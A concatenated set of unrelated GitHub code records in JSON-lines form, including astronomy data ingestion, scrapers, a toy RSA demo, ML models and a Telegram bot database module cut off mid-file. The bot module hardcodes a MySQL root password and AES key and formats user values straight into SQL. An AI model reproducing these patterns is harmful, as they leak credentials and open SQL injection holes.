fileparts[1][:2], source)\n\n f = open(fname, 'r')\n data = csv.reader(f, delimiter=' ', skipinitialspace=True)\n specdata = []\n for r, row in enumerate(data):\n if row[0] == '@TELESCOPE':\n telescope = row[1].strip()\n elif row[0] == '@REDSHIFT':\n catalog.entries[name].add_quantity(\n SUPERNOVA.REDSHIFT, row[1].strip(), source)\n if r < 14:\n continue\n specdata.append(list(filter(None, [x.strip(' \\t') for x in row])))\n specdata = [list(i) for i in zip(*specdata)]\n wavelengths = specdata[1]\n\n fluxes = [pretty_num(float(x) * 1.e-16, sig=get_sig_digits(x))\n for x in specdata[2]]\n # FIX: this isnt being used\n # errors = [pretty_num(float(x)*1.e-16, sig=get_sig_digits(x)) for x in\n # specdata[3]]\n\n catalog.entries[name].add_spectrum(\n u_wavelengths='Angstrom', u_fluxes='erg/s/cm^2/Angstrom',\n wavelengths=wavelengths,\n fluxes=fluxes, u_time='MJD' if name in datedict else '',\n time=datedict[name] if name in datedict else '',\n telescope=telescope, source=source,\n filename=filename)\n if catalog.args.travis and fi >= catalog.TRAVIS_QUERY_LIMIT:\n break\n catalog.journal_entries()\n return\n","repo_name":"finzellt/novae","sub_path":"tasks/snls.py","file_name":"snls.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"28833424054","text":"from bs4 import BeautifulSoup\nimport requests\n\n# find the most upvoted entry\n\nresponse = requests.get(\"https://news.ycombinator.com\")\nyc_web_page = response.text\n\nsoup = BeautifulSoup(yc_web_page, \"html.parser\")\n\narticles = soup.find_all(name=\"a\", rel=\"noreferrer\")\n\n\narticle_link = []\narticle_text = []\n\nfor article_tag in articles:\n article_link.append(article_tag.get(\"href\"))\n article_text.append(article_tag.getText())\n\nupvote =[score.getText() for score in soup.find_all(name=\"span\", class_=\"score\")]\narticle_upvote = [int(score.split()[0]) for score in upvote]\n\n# print(article_text)\n# print(article_link)\n# print(article_upvote)\n\n\nindex_of_max = article_upvote.index(max(article_upvote))\nprint(index_of_max+1)\nprint(article_text[index_of_max])\nprint(article_link[index_of_max])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ulkat/100daysofpython","sub_path":"day-45 Web Scraping/bs4-start/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13084985930","text":"def encode(p):\n m = ''\n for i in range(len(p)):\n a = ord(p[i])\n if a == 32:\n a = 64\n a -= 64\n if a == 0:\n m += '00'\n elif a < 10:\n m += '0' + str(a)\n else:\n m += str(a)\n\n return m\n\ndef decode(p):\n m = ''\n\n for i in range(0, len(p), 2):\n a = int(p[i:i+2]) + 64\n if a == 64:\n a = 32\n m += chr(a)\n\n return m\n\n\ndef encipher(p, n, pk):\n c = ''\n i = 0\n\n while i < len(p):\n m = ''\n for j in range(4):\n m += p[i+j]\n i += 4\n a = int(m)\n t = a\n for k in range(pk):\n b = t % n\n t = a * b\n if b < 10:\n c += '000' + str(b)\n elif b < 100:\n c += '00' + str(b)\n elif b < 1000:\n c += '0' + str(b)\n else:\n c += str(b)\n\n return c\n\ndef decipher(p, n, sk):\n c = ''\n i = 0\n\n while i < len(p):\n m = ''\n for j in range(4):\n m += p[i+j]\n i += 4\n a = int(m)\n t = a\n for k in range(sk):\n b = t % n\n t = a * b\n if b < 10:\n c += '000' + str(b)\n elif b < 100:\n c += '00' + str(b)\n elif b < 1000:\n c += '0' + str(b)\n else:\n c += str(b)\n\n return c\n\n\nplainText = 'SAVE PRIVATE RYAN '\n\nN = 3713\n# 공개키\nS = 97\n# 비밀키\nP = 37\nplainMessage = encode(plainText)\n\nprint('평문 : ', plainMessage)\ncipherMessage = encipher(plainMessage, N, P)\nprint('암호문 : ', cipherMessage)\ndecipherMessage = decipher(cipherMessage, N, S)\nprint('복호문 : ', decipherMessage)\n\ndecodeMessage = decode(decipherMessage)\nprint('��호된 내용 : ', decodeMessage)\n","repo_name":"EEDK/2020-2-INUCS-Algorithm","sub_path":"stringAlgorithm/RSAencipher.py","file_name":"RSAencipher.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10012430267","text":"def app(environ, start_response):\n \"\"\"Simplest possible application object\"\"\"\n data = environ['QUERY_STRING'].split('&')\n data = [item+'\\r\\n' for item in data]\n data = [item.encode() for item in data]\n status = '200 OK'\n response_headers = [\n ('Content-type','text/plain'),\n ]\n start_response(status, response_headers)\n return iter(data)\n","repo_name":"KostiganSavin/stepic-web","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12362960434","text":"# noqa: D205,D400\n\"\"\"\nData checks\n===========\n\nUtilities designed to check the validity of data inputs.\n\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Sequence\n\nimport xarray as xr\n\nfrom .calendar import compare_offsets, parse_offset\nfrom .options import datacheck\nfrom .utils import ValidationError\n\n\n@datacheck\ndef check_freq(var: xr.DataArray, freq: str | Sequence[str], strict: bool = True):\n \"\"\"Raise an error if not series has not the expected temporal frequency or is not monotonically increasing.\n\n Parameters\n ----------\n var : xr.DataArray\n Input array.\n freq : str or sequence of str\n The expected temporal frequencies, using Pandas frequency terminology ({'A', 'M', 'D', 'H', 'T', 'S', 'L', 'U'})\n and multiples thereof. To test strictly for 'W', pass '7D' with `strict=True`.\n This ignores the start flag and the anchor (ex: 'AS-JUL' will validate against 'Y').\n strict : bool\n Whether multiples of the frequencies are considered invalid or not. With `strict` set to False, a '3H' series\n will not raise an error if freq is set to 'H'.\n \"\"\"\n if isinstance(freq, str):\n freq = [freq]\n exp_base = [parse_offset(frq)[1] for frq in freq]\n v_freq = xr.infer_freq(var.time)\n if v_freq is None:\n raise ValidationError(\n \"Unable to infer the frequency of the time series. \"\n \"To mute this, set xclim's option data_validation='log'.\"\n )\n v_base = parse_offset(v_freq)[1]\n if v_base not in exp_base or (\n strict and all(compare_offsets(v_freq, \"!=\", frq) for frq in freq)\n ):\n raise ValidationError(\n f\"Frequency of time series not {'strictly' if strict else ''} in {freq}. \"\n \"To mute this, set xclim's option data_validation='log'.\"\n )\n\n\ndef check_daily(var: xr.DataArray):\n \"\"\"Raise an error if not series has a frequency other that daily, or is not monotonically increasing.\n\n Notes\n -----\n This does not check for gaps in series.\n \"\"\"\n return check_freq(var, \"D\")\n","repo_name":"dougiesquire/xclim","sub_path":"xclim/core/datachecks.py","file_name":"datachecks.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"70101000009","text":"\"\"\" Day 14: Reindeer Olympics\n\nAuthor: Ic4r0 - https://github.com/Ic4r0\n\nCreated: 10th December 2021\n\"\"\"\n\n# imports\nfrom utils.parse_input import parse_by_line\nfrom re import match\n\n\n# modules\ndef compute_space(reindeer: dict, max_time: int) -> int:\n \"\"\" Compute traveled distance of a single reindeer\n\n :param reindeer: dict containing info about reindeer\n :param max_time: observation period\n :return: numeric result\n \"\"\"\n distance = 0\n time = 0\n while time < max_time:\n if time + reindeer['time'] > max_time:\n distance += (max_time - time) * reindeer['speed']\n else:\n distance += reindeer['time'] * reindeer['speed']\n time += reindeer['time'] + reindeer['rest']\n return distance\n\n\ndef part_1(reindeer: dict, is_test: bool) -> int:\n \"\"\" Code for the 1st part of the 14th day of Advent of Code\n\n :param reindeer: dict containing info about reindeer\n :param is_test: flag to use test max_time\n :return: numeric result\n \"\"\"\n max_time = 1000 if is_test else 2503\n distances = []\n for single_reindeer in reindeer.keys():\n distances.append(compute_space(reindeer[single_reindeer], max_time))\n return max(distances)\n\n\ndef part_2(reindeer: dict, is_test: bool) -> int:\n \"\"\" Code for the 2nd part of the 14th day of Advent of Code\n\n :param reindeer: dict containing info about reindeer\n :param is_test: flag to use test max_time\n :return: numeric result\n \"\"\"\n max_time = 1000 if is_test else 2503\n reindeer_list = reindeer.keys()\n points = {single_reindeer: 0 for single_reindeer in reindeer_list}\n for second in range(1, max_time):\n results_by_seconds = []\n for single_reindeer in reindeer_list:\n results_by_seconds.append(compute_space(reindeer[single_reindeer], second))\n max_values_names = [\n list(reindeer_list)[idx] for idx, result in enumerate(results_by_seconds)\n if result == max(results_by_seconds)\n ]\n for name in max_values_names:\n points[name] += 1\n\n return max(points.values())\n\n\ndef day_14(selected_part: int = None, test: bool = False):\n \"\"\" Needed to select which part of the 14th day we want to execute\n\n :param selected_part: selected Advent of Code part of the 14th day\n :param test: flag to use test input\n \"\"\"\n input_list = parse_by_line(14, int_list=False, is_test=test)\n reindeer = dict()\n for line in input_list:\n matches = match(r'(\\w+) can fly (\\d+) km/s for (\\d+) seconds, but then must rest for (\\d+) seconds.', line)\n name, speed, time, rest = matches.groups()\n reindeer[name] = {\n 'speed': int(speed),\n 'time': int(time),\n 'rest': int(rest),\n }\n\n if selected_part == 1 or not selected_part:\n result_part_1 = part_1(reindeer, is_test=test)\n print('The result of 1st part of the 14th day of AoC is: ' + str(result_part_1))\n if selected_part == 2 or not selected_part:\n result_part_2 = part_2(reindeer, is_test=test)\n print('The result of 2nd part of the 14th day of AoC is: ' + str(result_part_2))\n","repo_name":"Ic4r0/advent_of_code2015","sub_path":"days/day_14.py","file_name":"day_14.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70545685449","text":"import torch\nimport torch.nn as nn\nfrom torch.nn.parameter import Parameter\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\n\n\nclass GraphAttentionLayer(nn.Module):\n\n def __init__(self, requires_grad=True):\n super(GraphAttentionLayer, self).__init__()\n if requires_grad:\n # unifrom initialization\n self.beta = Parameter(torch.Tensor(1).uniform_(\n 0, 1), requires_grad=requires_grad)\n else:\n self.beta = Variable(torch.zeros(1), requires_grad=requires_grad)\n\n def forward(self, x, adj, aff_cropping):\n\n norm2 = torch.norm(x, 2, 1).view(-1, 1)\n cos = torch.div(torch.mm(x, x.t()), torch.mm(norm2, norm2.t()) + 1e-7)\n\n mask = torch.zeros_like(aff_cropping).cuda()\n mask[aff_cropping == 0] = -1e9\n mask[cos<0] = -1e9\n cos = self.beta.cuda() * cos\n masked = cos + mask + 10 * adj\n\n # propagation matrix\n P = F.softmax(masked, dim=1)\n\n # attention-guided propagation\n output = torch.mm(P, x)\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + ' (16 -> 16)'\n\n\nclass LinearLayer(nn.Module):\n\n def __init__(self, in_features, out_features, initializer=nn.init.xavier_uniform_):\n super(LinearLayer, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(initializer(\n torch.Tensor(in_features, out_features)))\n\n def forward(self, input):\n # no bias\n return torch.mm(input, self.weight)\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' \\\n + str(self.in_features) + ' -> ' \\\n + str(self.out_features) + ')'\n\n\nclass A2GNN(nn.Module):\n\n def __init__(self, nfeat, nhid, nclass, nlayers, dropout_rate):\n super(A2GNN, self).__init__()\n\n self.layers = nlayers\n self.dropout_rate = dropout_rate\n\n self.embeddinglayer = LinearLayer(nfeat, nhid)\n nn.init.xavier_uniform_(self.embeddinglayer.weight)\n\n self.attentionlayers = nn.ModuleList()\n # for Cora dataset, the first propagation layer is non-trainable\n # and beta is fixed at 0\n self.attentionlayers.append(GraphAttentionLayer(requires_grad=True))\n for i in range(1, self.layers):\n self.attentionlayers.append(GraphAttentionLayer())\n\n self.outputlayer = LinearLayer(nhid, nclass)\n nn.init.xavier_uniform_(self.outputlayer.weight)\n\n def forward(self, x, adj, aff_cropping):\n x = F.relu(self.embeddinglayer(x))\n x = F.dropout(x, self.dropout_rate, training=self.training)\n\n for i in range(self.layers):\n x = self.attentionlayers[i](x, adj, aff_cropping)\n fts = x.clone()\n\n x = self.outputlayer(x)\n\n return x,fts\n","repo_name":"zbf1991/A2GNN","sub_path":"pygcn/A2GNN.py","file_name":"A2GNN.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"16"} +{"seq_id":"39737261139","text":"#!/usr/bin/python\n# encoding: utf-8\n\n\"\"\"\n@author: Ian\n@contact:yongguiluo@hotmail.com\n@file: bilstm_seq2seq.py\n@time: 2019/3/11 17:02\n\"\"\"\nimport re\nimport numpy as np\nimport pandas as pd\nfrom mayiutils.file_io.pickle_wrapper import PickleWrapper as picklew\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Dense, Embedding, LSTM, TimeDistributed, Input, Bidirectional\nfrom tensorflow.keras.models import Model, load_model\n\n\ndef clean(s): #整理一下数据,有些不规范的地方\n if '“/s' not in s:\n return s.replace(' ”/s', '')\n elif '”/s' not in s:\n return s.replace('“/s ', '')\n elif '‘/s' not in s:\n return s.replace(' ’/s', '')\n elif '’/s' not in s:\n return s.replace('‘/s ', '')\n else:\n return s\n\n\ndef get_xy(s):\n \"\"\"\n 获取word序列和label序列\n\n :param s:\n :return:\n (['“', '人', '们', '常', '说', '生', '活', '是', '一', '部', '教', '科', '书'],\n ['s', 'b', 'e', 's', 's', 'b', 'e', 's', 's', 's', 'b', 'm', 'e'])\n \"\"\"\n s = re.findall('(.)/(.)', s)\n # print(s)\n if s:\n s = np.array(s)\n return list(s[:, 0]), list(s[:, 1])\n\n\ndef trans_one(x):\n \"\"\"\n 把label ['s', 'b'...]转换为one-hot形式\n :param x:\n :return:\n \"\"\"\n _ = map(lambda y: tf.keras.utils.to_categorical(y,5), tag[x].values.reshape((-1,1)))\n _ = list(_)\n _.extend([np.array([[0,0,0,0,1]])]*(maxlen-len(x)))\n return np.array(_)\n#转移概率,单纯用了等概率\nzy = {'be':0.5,\n 'bm':0.5,\n 'eb':0.5,\n 'es':0.5,\n 'me':0.5,\n 'mm':0.5,\n 'sb':0.5,\n 'ss':0.5\n }\n\nzy = {i:np.log(zy[i]) for i in zy.keys()}\n\n\ndef viterbi(nodes):\n paths = {'b': nodes[0]['b'], 's': nodes[0]['s']}\n for l in range(1,len(nodes)):\n paths_ = paths.copy()\n paths = {}\n for i in nodes[l].keys():\n nows = {}\n for j in paths_.keys():\n if j[-1]+i in zy.keys():\n nows[j+i] = paths_[j]+nodes[l][i]+zy[j[-1]+i]\n k = np.argmax(list(nows.values()))\n paths[list(nows.keys())[k]] = list(nows.values())[k]\n return list(paths.keys())[np.argmax(paths.values())]\n\n\ndef simple_cut(s):\n if s:\n r = model.predict(np.array([list(chars[list(s)].fillna(0).astype(int))+[0]*(maxlen-len(s))]), verbose=False)[0][:len(s)]\n # print(type(r), r.shape, r[:2])\n # return\n r = np.log(r)\n nodes = [dict(zip(['s', 'b', 'm', 'e'], i[:4])) for i in r]\n t = viterbi(nodes)\n words = []\n for i in range(len(s)):\n if t[i] in ['s', 'b']:\n words.append(s[i])\n else:\n words[-1] += s[i]\n return words\n else:\n return []\n\n\nnot_cuts = re.compile(r'([\\da-zA-Z ]+)|[。,、?!.?,!]')\n\n\ndef cut_word(s):\n result = []\n j = 0\n for i in not_cuts.finditer(s):\n result.extend(simple_cut(s[j:i.start()]))\n result.append(s[i.start():i.end()])\n j = i.end()\n result.extend(simple_cut(s[j:]))\n return result\n\n\nif __name__ == '__main__':\n mode = 2\n chars = picklew.loadFromFile('chars.pkl')\n maxlen = 32\n if mode == 2:\n model = load_model('model.h5')\n simple_cut('苏剑林是科学空间的博主')\n print(cut_word('苏剑林是科学空间的博主'))\n print(cut_word('你是真的遇到过报错了'))\n print(cut_word('列夫·托尔斯泰是俄罗斯一位著名的作家'))\n if mode == 1:\n \"\"\"\n train model\n \"\"\"\n s = open('msr_train.txt', encoding='gbk').read()\n s = s.split('\\r\\n')\n # print(s[0])\n s = ''.join(map(clean, s))\n s = re.split(r'[,。!?、]/[bems]', s)\n print(s[0])\n data = [] # 生成训练样本\n label = []\n for i in s:\n x = get_xy(i)\n if x:\n data.append(x[0])\n label.append(x[1])\n\n d = pd.DataFrame(index=range(len(data)))\n d['data'] = data\n d['label'] = label\n # print(d.head())\n \"\"\"\n 抛弃了多于32字的样本,这部分样本很少,事实上,用逗号、句号等天然分隔符分开后,句子很少有多于32字的。\n \"\"\"\n\n d = d[d['data'].apply(len) <= maxlen]\n d.index = range(len(d))\n \"\"\"\n 这次我用了5tag,在原来的4tag的基础上,加上了一个x标签,\n 用来表示不够32字的部分,比如句子是20字的,那么第21~32个标签均为x。\n \"\"\"\n tag = pd.Series({'s': 0, 'b': 1, 'm': 2, 'e': 3, 'x': 4})\n chars = [] # 统计所有字,跟每个字编号\n for i in data:\n chars.extend(i)\n # 按照词频出现的高低给word编号\n chars = pd.Series(chars).value_counts().sort_values(ascending=False)\n chars[:] = range(1, len(chars) + 1)\n picklew.dump2File(chars, 'chars.pkl')\n # # 生成适���模型输入的格式\n # d['x'] = d['data'].apply(lambda x: np.array(list(chars[x]) + [0] * (maxlen - len(x))))\n #\n # d['y'] = d['label'].apply(trans_one)\n\n # picklew.dump2File(d, 'd.pkl')\n d = picklew.loadFromFile('d.pkl')\n # 设计模型\n word_size = 128\n maxlen = 32\n\n sequence = Input(shape=(maxlen,), dtype='int32')\n embedded = Embedding(len(chars) + 1, word_size, input_length=maxlen, mask_zero=True)(sequence)\n blstm = Bidirectional(LSTM(64, return_sequences=True), merge_mode='sum')(embedded)\n output = TimeDistributed(Dense(5, activation='softmax'))(blstm)\n model = Model(inputs=sequence, outputs=output)\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n print(model.summary())\n \"\"\"\n _________________________________________________________________\n Layer (type) Output Shape Param # \n =================================================================\n input_1 (InputLayer) (None, 32) 0 \n _________________________________________________________________\n embedding (Embedding) (None, 32, 128) 660864 \n _________________________________________________________________\n bidirectional (Bidirectional (None, 32, 64) 98816 \n _________________________________________________________________\n time_distributed (TimeDistri (None, 32, 5) 325 \n =================================================================\n Total params: 760,005\n Trainable params: 760,005\n Non-trainable params: 0\n _________________________________________________________________\n None\n \"\"\"\n batch_size = 1024\n history = model.fit(np.array(list(d['x'])), np.array(list(d['y'])).reshape((-1, maxlen, 5)), batch_size=batch_size,\n nb_epoch=50)\n model.save('model.h5')\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mayi140611/mayiutils","sub_path":"apps/lstmtest/bilstm_seq2seq.py","file_name":"bilstm_seq2seq.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70253672008","text":"#!/usr/bin/python3\n\"\"\"a module with a prime number game\"\"\"\n\n\ndef is_prime(num):\n \"\"\"checks if the number us prime\"\"\"\n if num <= 1:\n return False\n if num <= 3:\n return True\n if num % 2 == 0 or num % 3 == 0:\n return False\n i = 5\n while i * i <= num:\n if num % i == 0 or num % (i + 2) == 0:\n return False\n i += 6\n return True\n\n\ndef isWinner(x, nums):\n \"\"\"determines the winner\"\"\"\n maria_wins = 0\n ben_wins = 0\n\n for n in nums:\n # Count the number of prime numbers in the range [1, n]\n prime_count = sum(1 for i in range(1, n + 1) if is_prime(i))\n\n # If the number of prime numbers is odd, Maria wins\n # If the number of prime numbers is even, Ben wins\n if prime_count % 2 == 1:\n maria_wins += 1\n else:\n ben_wins += 1\n\n if maria_wins > ben_wins:\n return \"Maria\"\n elif ben_wins > maria_wins:\n return \"Ben\"\n else:\n return None\n","repo_name":"Mmah-Zombo/alx-interview","sub_path":"0x0A-primegame/0-prime_game.py","file_name":"0-prime_game.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2478278175","text":"import json\r\nimport os\r\nfrom PIL import Image\r\n\r\n#loading data from config.json\r\nwith open(\"config.json\", \"r\") as f:\r\n config = json.load(f)\r\n\r\nprint(config['new_size_ratio'])\r\n\r\n\r\ndef get_size_format(b, factor=1024, suffix=\"B\"):\r\n \"\"\"\r\n Scale bytes to its proper byte format\r\n e.g:\r\n 1253656 => '1.20MB'\r\n 1253656678 => '1.17GB'\r\n \"\"\"\r\n for unit in [\"\", \"K\", \"M\", \"G\", \"T\", \"P\", \"E\", \"Z\"]:\r\n if b < factor:\r\n return f\"{b:.2f}{unit}{suffix}\"\r\n b /= factor\r\n return f\"{b:.2f}Y{suffix}\"\r\n\r\n\r\ndef compress_img(image_name, new_size_ratio=config['new_size_ratio'], quality=config['quality'], width=config['width'], height=config['height'], to_jpg=True):\r\n print(new_size_ratio,quality,width,height)\r\n # load the image to memory\r\n img = Image.open(image_name)\r\n # print the original image shape\r\n print(\"[*] Image shape:\", img.size)\r\n # get the original image size in bytes\r\n image_size = os.path.getsize(image_name)\r\n # print the size before compression/resizing\r\n print(\"[*] Size before compression:\", get_size_format(image_size))\r\n if new_size_ratio == 1.0:\r\n # if resizing ratio is below 1.0, then multiply width & height with this ratio to reduce image size\r\n img = img.resize((int(img.size[0] * new_size_ratio), int(img.size[1] * new_size_ratio)), Image.ANTIALIAS)\r\n # print new image shape\r\n print(\"[+] New Image shape:\", img.size)\r\n elif width and height:\r\n # if width and height are set, resize with them instead\r\n img = img.resize((width, height), Image.ANTIALIAS)\r\n # print new image shape\r\n print(\"[+] New Image shape:\", img.size)\r\n # split the filename and extension\r\n filename, ext = os.path.splitext(image_name)\r\n # make new filename appending _compressed to the original file name\r\n\r\n new_filename ='a_compress.jpg' \r\n a=config['output_file_image'] + new_filename\r\n # save the image with the corresponding quality and optimize set to True\r\n img.save(f\"{config['output_file_image']}/a.jpg\", quality=quality, optimize=True)\r\n print(\"[+] New file saved:\", new_filename)\r\n# calling the function\r\ncompress_img(config['input_file_image'])","repo_name":"sumit-iot/video_and_image_compression","sub_path":"Compress_image.py","file_name":"Compress_image.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32492983534","text":"# The OpenStack Way\nfrom oslo import messaging\nfrom oslo.config import cfg\n\nTRANSPORT = None\nNOTIFIER = None\n\ndef init(conf):\n\tglobal TRANSPORT, NOTIFIER\n\tTRANSPORT = messaging.get_transport(conf)\n\tdriver = 'messaging'\n\tNOTIFIER = messaging.Notifier(TRANSPORT, driver=driver)\n\ndef get_client(topic):\n\tassert TRANSPORT is not None\n\ttarget = messaging.Target(topic=topic)\n\treturn messaging.RPCClient(TRANSPORT, target)\n\n\ndef get_server(topic, endpoints):\n\tassert TRANSPORT is not None\n\tassert type(endpoints) is list\n\tcfg.CONF.import_opt('host', 'sim.nova.compute')\n\ttarget = messaging.Target(topic=topic, server=cfg.CONF.host)\n\treturn messaging.get_rpc_server(TRANSPORT, target, endpoints)\n\ndef get_notifier(publisher_id):\n\t\tassert NOTIFIER is not None\n\t\treturn NOTIFIER.prepare(publisher_id=publisher_id)\n","repo_name":"affear/smart_alloc_simulator","sub_path":"sim/nova/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"8461174519","text":"# P183\n# 变量作用域:变量生效的范围,主要分为 局部变量 和 全局变量\ndef testA():\n a = 100\n print(a) # 函数内部访问,则可以访问变量 a\n\ntestA() # 100\n# print(a)\n\n# NameError: name 'a' is not defined\n# a 是一个局部变量不能全局生效,故显示a没有被定义\n\nx = 10\ndef f():\n x = 5\n print('f内部: x=', x)\n return x * x\n\nprint('f()=', f())\n# f内部: x= 5 # 局部变量和全局变量同名时,局部变量屏蔽全局变量,简称“局部优先”\n# f()= 25 # 若 x = 5 不存在,则 x 可以访问外部变量此时 x = 10,局部变量可以访问全局变量,全局变量不可以访问局部变量\nprint('f外部: x=', x) \n# f外部: x= 10\n\n# 如何在将局部变量变为全局变量?修改局部变量为全局变量\n'''\n语法: \nglobal 变量\n变量 = 数值'''\na = 100\ndef testA():\n global a # global 将 a 定义为了全局变量,位置位于 a = 100 下面,所以 a 的值新定义为了 200\n a = 200\n print(a)\n\nprint(a)\n# 100 \ntestA()\n# 200\nprint(a)\n# 200\n\n# 返回值作为参数传递\ndef test1():\n return 50\n\ndef test2(num):\n print(num)\n\nresult = test1()\ntest2(result)\n# 50","repo_name":"luguodezhangsan/VsCode_Python","sub_path":"050-函数变量作用域.py","file_name":"050-函数变量作用域.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14764925989","text":"from tkinter import *\n\n\ndef qwer():\n user_inp = user.get()\n if user_inp == '1':\n text_win.insert(0.1, f'{type(user_inp)} - 1\\n')\n elif user_inp == '2':\n text_win.insert(0.0, f'{type(user_inp)} - 2\\n')\n else:\n text_win.insert(0.0, f'Вы ввели текст {type(user_inp)}\\n')\n\n\n\nwin = Tk()\nwin.geometry('500x500')\n\nuser = Entry(win)\nuser.pack()\n\nbtn = Button(win, text='проверить', command=qwer)\nbtn.pack()\n\nglobal text_win\ntext_win = Text(win)\ntext_win.pack()\n\nwin.mainloop()","repo_name":"FrodoB-Shire/programm_for_img","sub_path":"ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14321288413","text":"n=int(input(\"enter which term you want to get?:-\"))\nsum=0\nk=1\nd=2\na=3\nfor i in range(1,n):\n\tprint(k,',',end='')\n\tk+=a\n\ta+=d\nprint(f'\\n{n}th term=',k)","repo_name":"Sur818/Coding-Projects","sub_path":"python programming/forloop97_nth term.py","file_name":"forloop97_nth term.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37065598864","text":"import asyncio\nimport aiomysql\n\nfrom .MessageTexts import *\nfrom ..secound.secound_constants import *\nfrom ..secound.Seller.const4seller import *\nfrom ..secound.Seller.constdb4dbseller import *\n\nasync def db4takjoy(flag_Update_Token, **kwargs):\n pre_secure = \"\"\"SET block_encryption_mode = 'aes-256-cbc'; \n SET @key_str = SHA2('My secret passphrase',512);\n SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~'; \"\"\" \n db2mem_citypost = (\"\"\"select AES_DECRYPT(`city_name`,@key_str, @init_vector), AES_DECRYPT(`post_purchase`,@key_str, @init_vector) from {table4citypost};\"\"\")\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4citypost}(\n `citypost_no` int(12) NOT NULL AUTO_INCREMENT,\n `city_name` Text not NULL,\n `post_purchase` Text not NULL,\n PRIMARY KEY(citypost_no));\"\"\")\n select4customer = (\"\"\"select AES_DECRYPT(user_id,@key_str, @init_vector),\n AES_DECRYPT(user_name,@key_str, @init_vector),\n AES_DECRYPT(first_name,@key_str, @init_vector),\n AES_DECRYPT(last_name,@key_str, @init_vector),\n AES_DECRYPT(Address,@key_str, @init_vector),\n AES_DECRYPT(Phone_Number,@key_str, @init_vector)\n from {table4customer};\"\"\")\n create_customer_table = (\"\"\"CREATE TABLE IF NOT EXISTS {table4customer}(\n `emp_nu` int(12) NOT NULL AUTO_INCREMENT,\n `user_id` Text NULL,\n `user_name` Text NULL,\n `first_name` Text NULL,\n `last_name` Text NULL,\n `Address` Text NULL,\n `Phone_Number` Text NULL,\n `city_dict` Text NULL,\n `Postal_code` Text NULL,\n PRIMARY KEY(emp_nu));\"\"\")\n update_token = (\"\"\"SET block_encryption_mode = 'aes-256-cbc';\n SET @key_str = SHA2('My secret passphrase',512); \n SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~';\n SET @ENCRYPT_Bot_id = '{Bot_id}';\n SET @ENCRYPT_Token = '{Token}';\n UPDATE Token_Takjoy set `Token` = AES_ENCRYPT(@ENCRYPT_Token, @key_str, @init_vector) where `Bot_id` = AES_ENCRYPT(@ENCRYPT_Bot_id, @key_str, @init_vector);\"\"\")\n\n loop = asyncio.get_event_loop()\n conn = await aiomysql.connect(host='127.0.0.1', port=3306, \n user='root', password=\"lk1l,tr3ldal5\",charset = \"utf8\",\n db='Test', loop=loop)\n\n cur = await conn.cursor()\n async with conn.cursor() as cur: \n await cur.execute(sql)\n await conn.commit()\n if flag_Update_Token == 0:\n cur = await conn.cursor()\n insert_table = (\"\"\"SET block_encryption_mode = 'aes-256-cbc';\n SET @key_str = SHA2('My secret passphrase',512); \n SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~'; \n SET @ENCRYPT_User_id = '{User_id}'; \n SET @ENCRYPT_Bot_id = '{Bot_id}'; \n SET @ENCRYPT_Token = '{Token}'; \n INSERT IGNORE INTO Token_Takjoy(User_id, Token, Bot_Date, Bot_ID) \n VALUES(AES_ENCRYPT(@ENCRYPT_User_id,@key_str, @init_vector), \n AES_ENCRYPT(@ENCRYPT_Token,@key_str, @init_vector), \n (CURDATE() + interval {Daysetting} day), \n AES_ENCRYPT(@ENCRYPT_Bot_id,@key_str, @init_vector));\"\"\")\n \n len_flag = len(saveindb)\n for i in range(0,len_flag):\n my_user_id = saveindb.pop()\n await cur.execute(insert_table.format(User_id = str(my_user_id),\n Token = true_token[my_user_id], \n Bot_id = kwargs[\"Bot_id\"], \n Daysetting = int(kwargs[\"Daysetting\"])))\n await conn.commit() \n\n elif flag_Update_Token == 1: \n await cur.execute(befor_select_all)\n await conn.commit()\n await cur.execute(select_all)\n await 